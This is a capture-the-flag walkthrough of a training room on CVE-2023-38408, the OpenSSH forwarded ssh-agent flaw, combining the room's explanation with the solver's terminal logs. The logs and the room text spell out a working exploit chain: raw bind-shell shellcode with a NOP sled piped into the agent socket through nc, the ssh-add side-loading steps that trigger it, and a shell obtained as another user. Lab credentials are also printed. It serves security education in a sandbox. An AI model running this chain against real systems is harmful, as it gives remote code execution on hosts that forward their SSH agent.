Start Machine
NIST assigned the CVE identifier CVE-2023-38408 on July 19th in response to a critical vulnerability in OpenSSH's PKCS#11 feature prior to version 9.3p2. This security flaw, which allows remote code execution if an agent is forwarded to an attacker-controlled system due to an insufficiently trustworthy search path, has been found by The Qualys Threat Research Unit (TRU). It's essential to note that loading code from /usr/lib into ssh-agent can pose significant risks. This vulnerability represents an incomplete fix for a previous CVE-2016-10009.
The discovered vulnerability impacts all OpenSSH versions preceding 9.3p2, posing substantial risks for users who utilize agent forwarding in untrusted environments. To safeguard against the threat of remote code execution, it is strongly advised to upgrade to OpenSSH version 9.3p2 or above.
To deploy the attached VM, press the green Start Machine button at the top of the task and connect to the machine via SSH, you can use the following credentials:
| Username | redqueenrebel |
| Password | DownTheRabbitHole! |
Answer the questions below
Let’s get started!
Completed
Initially, ssh-agent allowed loading any shared library without filtering, leading to security concerns. In response to CVE-2016-10009, an allow-list (/usr/lib*/,/usr/local/lib/ by default) was added to limit library loading. However, it is possible to abuse the side effects of the library's constructors (dlopen) and destructors (dlclose) to manipulate memory and control the program flow.
Code execution can be achieved by making the stack executable, registering a signal handler for SIGSEGV and manipulating its code, replacing the signal handler's code with code from another library, triggering a SIGSEGV, and replacing his handler's code to finally jump into the stack where the shellcode is stored.
The following paragraphs will present the detailed steps:
- Making the Stack Executable:
Leveraging dlopen() to load one of the libraries grants the ability to make the stack memory region (specifically the target process ssh-pkcs11-helper's stack) executable. This allows bypassing the usual protection against executing code on the stack.
- Copy the shellcode to the stack:
Once the shellcode is generated, typically using tools like Metasploit, it can be copied to the stack memory using the socket generated from the SSH connection. The shellcode is also combined with a NOP sled which is a sequence of No-Operation assembly instructions. The reason why is to provide a larger target for the program execution flow to land on during the gadget execution.
To verify whether the process has the desired executable flag, you can use the following commands in dbg, a Linux debugger. You can repeat the next few gdb commands once you have gained access as alice:
First, obtain the PID of the process ssh-pkcs11-helper.
- Attach dbg to the target process using its PID.
- Use the command info proc mapping to examine the memory mappings of the process.
- Look for the memory region corresponding to the stack, and check its flags, marked as rwx.
Terminal
alice@workstation:~$ ps -aux | grep pkcs11-helperalice
1522 0.0 0.2 7788 5520 ? S 09:22 0:00 /usr/lib/openssh/ssh-pkcs11-helper
alice@workstation:~$ sudo gdb -p 1522
[snip]
29 ../sysdeps/unix/sysv/linux/poll.c: No such file or directory. (gdb) info proc mappings process 1522 Mapped address spaces:
Start Addr End Addr Size Offset Perms objfile
[snip]
0x7ffc7a83b000 0x7ffc7a85c000 0x21000 0x0 rwxp
[stack]
0x7ffc7a9df000 0x7ffc7a9e3000 0x4000 0x0 r--p
[vvar]
0x7ffc7a9e3000 0x7ffc7a9e5000 0x2000 0x0 r-xp
[vdso]
0xffffffffff600000 0xffffffffff601000 0x1000 0x0 --xp
[snip]
Using gdb, you can verify whether the stack has the shellcode loaded by inspecting its content.
Regarding the command $rsp+10100, it is an expression that references a specific memory location relative to the stack pointer ($rsp). In this case, $rsp+10100 points to the memory location located 10100 bytes above the stack pointer.
Observe that it contains a series of NOP (No Operation) instructions followed by the start of the shellcode: 0x31 0xc0 0x48 0x31 0xc0 0xff 0x48
Terminal
(gdb) x/100xgb $rsp+10100
0x7ffc7a85994c: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x7ffc7a859954: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x7ffc7a85995c: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x7ffc7a859964: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x7ffc7a85996c: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x7ffc7a859974: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x7ffc7a85997c: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x7ffc7a859984: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x7ffc7a85998c: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x7ffc7a859994: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x7ffc7a85999c: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x7ffc7a8599a4: 0x90 0x90 0x90 0x90 0x90 0x48 0x31 0xc0
0x7ffc7a8599ac: 0x48 0x31 0xff 0x48
- Registering a Signal Handler:
To successfully execute arbitrary code within the exploit, a custom signal handler must be registered for the SIGSEGV signal. This signal, known as a Segmentation Fault, is triggered when a program attempts to access an invalid memory address. By registering the signal handler, the exploit gains the ability to define a user-defined function that will be executed whenever the SIGSEGV signal occurs.
- Replacing the Signal Handler's Code:
At this stage, the exploit leverages the technique of side-loading another library to replace the current signal handler's code with an alternative code segment that will jump to the stack where the shellcode is stored.
To ensure that the code segments of this new library remain mapped in memory even after dlclose() is invoked, the library must be marked with the "Nodelete" attribute. Ordinarily, when dlclose() is called to close a shared library, the library's code segments are unloaded from memory, and any associated resources are released. However, by utilizing the "Nodelete" attribute, the attacker prevents the code segments from being unloaded, effectively preserving their existence in memory beyond the dlclose() operation. This ensures that the replacement code, responsible for jumping to the shellcode in the stack, remains accessible and functional throughout the exploit's execution.
- Triggering SIGSEGV:
By employing yet another library, the attacker intentionally triggers a SIGSEGV signal, which prompts the kernel to execute the custom signal handler previously registered. This strategic step is a critical part of the exploit's progression.
Upon receiving the SIGSEGV signal, the kernel recognizes that an invalid memory access has occurred and proceeds to invoke the custom signal handler rather than terminate the program abruptly. By doing so, the attacker seizes the opportunity to manipulate the program's execution and steer it toward the injected malicious code located within the NOP sled.
- Executing the Replacement Code:
By achieving this precise jump into the executable stack, the exploit ensures that the program's execution is directed toward the specific memory location where the shellcode resides.
Answer the questions below
──(witty㉿kali)-[~/Downloads]
└─$ ssh redqueenrebel@10.10.159.56
redqueenrebel@workstation:~$ id;ls;ifconfig
uid=1002(redqueenrebel) gid=1002(redqueenrebel) groups=1002(redqueenrebel)
snap
Command 'ifconfig' not found, but can be installed with:
apt install net-tools
Please ask your administrator.
redqueenrebel@workstation:/home$ ls
alice redqueenrebel workstation
redqueenrebel@workstation:/home$
redqueenrebel@workstation:/home$ cd alice
-bash: cd: alice: Permission denied
redqueenrebel@workstation:/home$ sudo -l
[sudo] password for redqueenrebel:
Sorry, user redqueenrebel may not run sudo on workstation.
Let’s keep going!
Completed
Your objective will to escalate privileges and compromise the "alice" account. Using the AttackBox, and not your VM is highly suggested since you will allow any user with the alice SSH key to access your VM, and you may need to have all the software installed for the exploitation.
To get started, you need to set up the environment where your AttackBox will act as the Attacker box. Please note that the following steps are not necessary in a real-world environment and are specific to this vulnerable machine.
Step 1: Add Alice's Public Key
Clear your SSH sessions by using: rm -rf /tmp/ssh*
On your AttackBox, add Alice's public key to the authorized_keys file.
AttackBox Terminal
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCs4FT0kCeBfQ1co/PeApZn3NmZ68mUwEEbtP598IcBBDgpe+AauGtOVNxsptmZD26yjhTXp4RJgrreUgPJQ8ICDUvASD/2W8GOl5XpYddbrcHy+djyViQV/69VskB2Y9LCobbkYPBUjIKlObqgamM7HhcNO3Zu65AAtbu+31+N+swygYjTRB37cjQOLgI7FM9nmuhyb8uSMtttTJRD7ybXPfiHV8YxLENuJU0BGggc9i/hXKQKwhEvnliiqw/XdpK/JyT6t65DFvYYkT21bPHpBDMNzPauUgr2yagKMFNe8HFQfk/QibTcLMeV0JmCGeOcv8oJP/T4xJnnoetMvZGEPZ4hXH7E3n2wksLjuF2se61/c+SIh6Zm+gUYQESTAmmbRPeTj7RcZPRN22knpSyu76eZKBf/dmHYXQlIk1gKsouFdposOpxYRJ4Wt97uEPihW/wzzT+QPcLyYoGpbFXJmpqNaOBVJw1n0KqB98dL5Ixa32FKTCzaBPHkDmK/I2M= alice@workstation" >> /root/.ssh/authorized_keys
Step 2: Create the IP File
Next, create a file named /tmp/ip.txt on your VM instance (the vulnerable machine). Inside this file, write your AttackBox's IP address as its content.
So, for instance, if your AttackBox's IP is 10.10.10.10 you will have to run the following:
Workstation Terminal
redqueenrebel@workstation:~# echo "10.10.10.10" > /tmp/ip.txt
Step 3: Wait for Connection
At this point, your vulnerable machine should receive, within a minute, a connection from your AttackBox.
You can now use this connection to attempt to obtain the flag by leveraging your privileges! Get ready for an adventure, as you start digging down the rabbit hole into the depths of this CVE.
Answer the questions below
redqueenrebel@workstation:/tmp$ rm -rf /tmp/ssh*
┌──(root㉿kali)-[~/.ssh]
└─# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCs4FT0kCeBfQ1co/PeApZn3NmZ68mUwEEbtP598IcBBDgpe+AauGtOVNxsptmZD26yjhTXp4RJgrreUgPJQ8ICDUvASD/2W8GOl5XpYddbrcHy+djyViQV/69VskB2Y9LCobbkYPBUjIKlObqgamM7HhcNO3Zu65AAtbu+31+N+swygYjTRB37cjQOLgI7FM9nmuhyb8uSMtttTJRD7ybXPfiHV8YxLENuJU0BGggc9i/hXKQKwhEvnliiqw/XdpK/JyT6t65DFvYYkT21bPHpBDMNzPauUgr2yagKMFNe8HFQfk/QibTcLMeV0JmCGeOcv8oJP/T4xJnnoetMvZGEPZ4hXH7E3n2wksLjuF2se61/c+SIh6Zm+gUYQESTAmmbRPeTj7RcZPRN22knpSyu76eZKBf/dmHYXQlIk1gKsouFdposOpxYRJ4Wt97uEPihW/wzzT+QPcLyYoGpbFXJmpqNaOBVJw1n0KqB98dL5Ixa32FKTCzaBPHkDmK/I2M= alice@workstation" >> /root/.ssh/authorized_keys
┌──(root㉿kali)-[~/.ssh]
└─# ls
authorized_keys known_hosts known_hosts.old
┌──(root㉿kali)-[~/.ssh]
└─# cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCs4FT0kCeBfQ1co/PeApZn3NmZ68mUwEEbtP598IcBBDgpe+AauGtOVNxsptmZD26yjhTXp4RJgrreUgPJQ8ICDUvASD/2W8GOl5XpYddbrcHy+djyViQV/69VskB2Y9LCobbkYPBUjIKlObqgamM7HhcNO3Zu65AAtbu+31+N+swygYjTRB37cjQOLgI7FM9nmuhyb8uSMtttTJRD7ybXPfiHV8YxLENuJU0BGggc9i/hXKQKwhEvnliiqw/XdpK/JyT6t65DFvYYkT21bPHpBDMNzPauUgr2yagKMFNe8HFQfk/QibTcLMeV0JmCGeOcv8oJP/T4xJnnoetMvZGEPZ4hXH7E3n2wksLjuF2se61/c+SIh6Zm+gUYQESTAmmbRPeTj7RcZPRN22knpSyu76eZKBf/dmHYXQlIk1gKsouFdposOpxYRJ4Wt97uEPihW/wzzT+QPcLyYoGpbFXJmpqNaOBVJw1n0KqB98dL5Ixa32FKTCzaBPHkDmK/I2M= alice@workstation
redqueenrebel@workstation:~$ echo "10.8.19.103" > /tmp/ip.txt
redqueenrebel@workstation:/tmp$ cat /etc/passwd | grep "\/home"
syslog:x:104:111::/home/syslog:/usr/sbin/nologin
cups-pk-helper:x:115:122:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
workstation:x:1000:1000:workstation,,,:/home/workstation:/bin/bash
alice:x:1001:1001:,,,:/home/alice:/bin/bash
redqueenrebel:x:1002:1002:,,,:/home/redqueenrebel:/bin/bash
Be ready for the exploitation!
Completed
Start Machine
In this task, we will delve into running the exploit and gaining a more practical understanding of its functionality.
For this particular scenario, we will be working with two machines: the workstation (a vulnerable instance of Ubuntu 21.04) and another server which is under the attacker's control (Attackbox). To simulate the vulnerable instance, a connection between the workstation and the server has been employed in the previous task. There is a user alice who is connected from the workstation to the attacker using SSH agent forwarding. Alice does this by executing the following commands (so you do not have to):
Example Terminal
alice@workstation:~$ eval `ssh-agent -s`
Agent pid 1286
alice@workstation ~ [SIGINT]> ssh root@10.10.157.249 -A
Exploitation:
At this stage, several libraries can be side-loaded. It's important to note that these libraries will be executed from the attacker's control box, but their impact will be directed at the target workstation.
In order to execute the shellcode within the vulnerable process (ssh-pkcs11-helper), it is crucial that the stack of that process is flagged as executable:
AttackBox Terminal
root@attacker:~# echo /tmp/ssh-*/agent.*
/tmp/ssh-NqLP6il36s/agent.3452
root@attacker:~# export SSH_AUTH_SOCK=/tmp/ssh-NqLP6il36s/agent.3452
root@attacker:~# ssh-add -s /usr/lib/systemd/boot/efi/linuxx64.elf.stub
Enter passphrase for PKCS#11:
Could not add card "/usr/lib/systemd/boot/efi/linuxx64.elf.stub": agent refused operation
To copy the shellcode into the process using the SSH socket, you need to follow these steps:
- Obtain the
PIDof the SSH agent running on the remote attacker machine. - Once you have the socket, use netcat (
nc) to transfer the shellcode to the agent's memory (workstation). - After starting the transfer, wait for a few seconds to ensure the shellcode is fully copied into the target memory.
- Finally, press Ctrl-C to stop the netcat transfer once the shellcode is successfully placed in the agent's memory.
Note that the next command will not use ssh-add. Because the malicious payload is around 10KB passphrase and ssh-add has a limit of 1KB.
AttackBox Terminal
root@attacker:~#SHELLCODE=$'\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x7a\x69\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05' root@attacker:~# (perl -e 'print "\0\0\x27\xbf\x14\0\0\0\x10/usr/lib/modules\0\0\x27\xa6" . "\x90" x 10000'; echo -n "$ SHELLCODE") | nc -U "$SSH_AUTH_SOCK"
^C
The next step to the exploitation process is register the signal handler for the Segmentation Fault (SIGSEGV) signal.
AttackBox Terminal
root@attacker:~# ssh-add -s /usr/lib/titan/libttcn3-rt2-dynamic.so
Enter passphrase for PKCS#11:
Could not add card "/usr/lib/titan/libttcn3-rt2-dynamic.so": agent refused operation
After successfully registering the custom signal handler for SIGSEGV, the next crucial step in the exploitation process is to replace the original signal handler routine with a carefully chosen gadget. This gadget will serve as a means to redirect the program's execution flow and jump into the stack when the SIGSEGV signal is triggered.
AttackBox Terminal
root@attacker:~# ssh-add -s /usr/lib/x86_64-linux-gnu/libKF5SonnetUi.so.5.92.0
Enter passphrase for PKCS#11:
Could not add card "/usr/lib/x86_64-linux-gnu/libKF5SonnetUi.so.5.92.0": agent refused operation
Finally, by intentionally causing a segmentation fault, the SIGSEGV event can be triggered, executing the shellcode:
AttackBox Terminal
root@attacker:~# ssh-add -s /usr/lib/x86_64-linux-gnu/libns3.35-wave.so.0.0.0
Enter passphrase for PKCS#11:
With the exploitation successfully executed, an attacker may gain access to a bind shell (shellcode), which can be accessed using netcat.
Workstation Terminal
redqueenrebel@workstation ~/> nc localhost 31337
whoami
alice
Remember, curiosity and perseverance may just be the key to unlocking the flag!
If you make a mistake along the way, and you feel lost in wonderland, clear your SSH sessions from /tmp on the AttackBox and add again, on the vulnerable machine, the AttackBox's IP to the /tmp/ip.txt file.
Answer the questions below
https://www.qualys.com/2023/07/19/cve-2023-38408/rce-openssh-forwarded-ssh-agent.txt
┌──(root㉿kali)-[/tmp]
└─# rm -rf /tmp/ssh*
redqueenrebel@workstation:/tmp$ echo "10.8.19.103" > /tmp/ip.txt
┌──(root㉿kali)-[/tmp]
└─# echo /tmp/ssh-*/agent.*
/tmp/ssh-XXXXkjn0Ld/agent.756232
┌──(root㉿kali)-[/tmp]
└─# export SSH_AUTH_SOCK=/tmp/ssh-XXXXkjn0Ld/agent.756232
┌──(root㉿kali)-[/tmp]
└─# ssh-add -s /usr/lib/systemd/boot/efi/linuxx64.elf.stub
Enter passphrase for PKCS#11:
Could not add card "/usr/lib/systemd/boot/efi/linuxx64.elf.stub": agent refused operation
┌──(root㉿kali)-[/tmp]
└─# SHELLCODE=$'\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x7a\x69\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05'
┌──(root㉿kali)-[/home/witty/Downloads]
└─# (perl -e 'print "\0\0\x27\xbf\x14\0\0\0\x10/usr/lib/modules\0\0\x27\xa6" . "\x90" x 10000'; echo -n "$ SHELLCODE") | ncat -U "$SSH_AUTH_SOCK"
┌──(root㉿kali)-[/home/witty/Downloads]
└─# ssh-add -s /usr/lib/titan/libttcn3-rt2-dynamic.so
Enter passphrase for PKCS#11:
Could not add card "/usr/lib/titan/libttcn3-rt2-dynamic.so": agent refused operation
┌──(root㉿kali)-[/home/witty/Downloads]
└─# ssh-add -s /usr/lib/x86_64-linux-gnu/libKF5SonnetUi.so.5.92.0
Enter passphrase for PKCS#11:
Could not add card "/usr/lib/x86_64-linux-gnu/libKF5SonnetUi.so.5.92.0": agent refused operation
using attackbox
root@ip-10-10-255-117:~# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCs4FT0kCeBfQ1co/PeApZn3NmZ68mUwEEbtP598IcBBDgpe+AauGtOVNxsptmZD26yjhTXp4RJgrreUgPJQ8ICDUvASD/2W8GOl5XpYddbrcHy+djyViQV/69VskB2Y9LCobbkYPBUjIKlObqgamM7HhcNO3Zu65AAtbu+31+N+swygYjTRB37cjQOLgI7FM9nmuhyb8uSMtttTJRD7ybXPfiHV8YxLENuJU0BGggc9i/hXKQKwhEvnliiqw/XdpK/JyT6t65DFvYYkT21bPHpBDMNzPauUgr2yagKMFNe8HFQfk/QibTcLMeV0JmCGeOcv8oJP/T4xJnnoetMvZGEPZ4hXH7E3n2wksLjuF2se61/c+SIh6Zm+gUYQESTAmmbRPeTj7RcZPRN22knpSyu76eZKBf/dmHYXQlIk1gKsouFdposOpxYRJ4Wt97uEPihW/wzzT+QPcLyYoGpbFXJmpqNaOBVJw1n0KqB98dL5Ixa32FKTCzaBPHkDmK/I2M= alice@workstation" >> /root/.ssh/authorized_keys
redqueenrebel@workstation:~$ echo "10.10.255.117" > /tmp/ip.txt
root@ip-10-10-255-117:/tmp# echo /tmp/ssh-*/agent.*
/tmp/ssh-jhyvTxk9ORuS/agent.1400 /tmp/ssh-mRRV0jWeQE/agent.2754
root@ip-10-10-255-117:/tmp# export SSH_AUTH_SOCK=/tmp/ssh-jhyvTxk9ORuS/agent.1400
root@ip-10-10-255-117:/tmp# ssh-add -s /usr/lib/systemd/boot/efi/linuxx64.elf.stub
Enter passphrase for PKCS#11:
Could not add card "/usr/lib/systemd/boot/efi/linuxx64.elf.stub": agent refused operation
root@ip-10-10-255-117:/tmp# SHELLCODE=$'\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x7a\x69\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05'
root@ip-10-10-255-117:/tmp# (perl -e 'print "\0\0\x27\xbf\x14\0\0\0\x10/usr/lib/modules\0\0\x27\xa6" . "\x90" x 10000'; echo -n "$ SHELLCODE") | nc -U "$SSH_AUTH_SOCK"
^C
root@ip-10-10-124-131:/tmp# ssh-add -s /usr/lib/titan/libttcn3-rt2-dynamic.so
Enter passphrase for PKCS#11:
Could not add card "/usr/lib/titan/libttcn3-rt2-dynamic.so": agent refused operation
root@ip-10-10-124-131:/tmp# ssh-add -s /usr/lib/x86_64-linux-gnu/libKF5SonnetUi.so.5.92.0
Enter passphrase for PKCS#11:
Could not add card "/usr/lib/x86_64-linux-gnu/libKF5SonnetUi.so.5.92.0": agent refused operation
root@ip-10-10-124-131:/tmp# ssh-add -s /usr/lib/x86_64-linux-gnu/libns3.35-wave.so.0.0.0
Enter passphrase for PKCS#11:
Could not add card "/usr/lib/x86_64-linux-gnu/libns3.35-wave.so.0.0.0": agent refused operation
redqueenrebel@workstation:/tmp$ nc localhost 31337
whoami
alice
ls
bin
boot
cdrom
dev
etc
home
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
swapfile
sys
tmp
usr
var
cd /home/alice
ls
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
Videos
nohup.out
snap
cd Desktop
ls
flag.txt
cat flag.txt
THM{CURIOUS_ALICE_LEARNED_NO_WONDERLAND_FOR_HACKERS}
What is the alice flag.txt?
THM{CURIOUS_ALICE_LEARNED_NO_WONDERLAND_FOR_HACKERS}
"Secure like Mad Hatter's tea party."
Finally, the take-home message from the finding of CVE-2023-38408 with its advanced exploitation is that even if something is patched and believed secure, it may be still vulnerable.
Our analysis taught us the necessity of carefully filtering shared libraries and avoiding dangerous side effects, especially when dealing with privileged programs like ssh-agent. The exploit's complexity highlights the significance of safe coding approaches, comprehensive testing, and continuous monitoring to detect and neutralize any dangers.
This exploit also highlights the complexity of modern cyber security concerns, as exploit makers are continuously looking for new ways to breach defenses.
Answer the questions below
Finished the room!
Completed
[[x86 Architecture Overview]]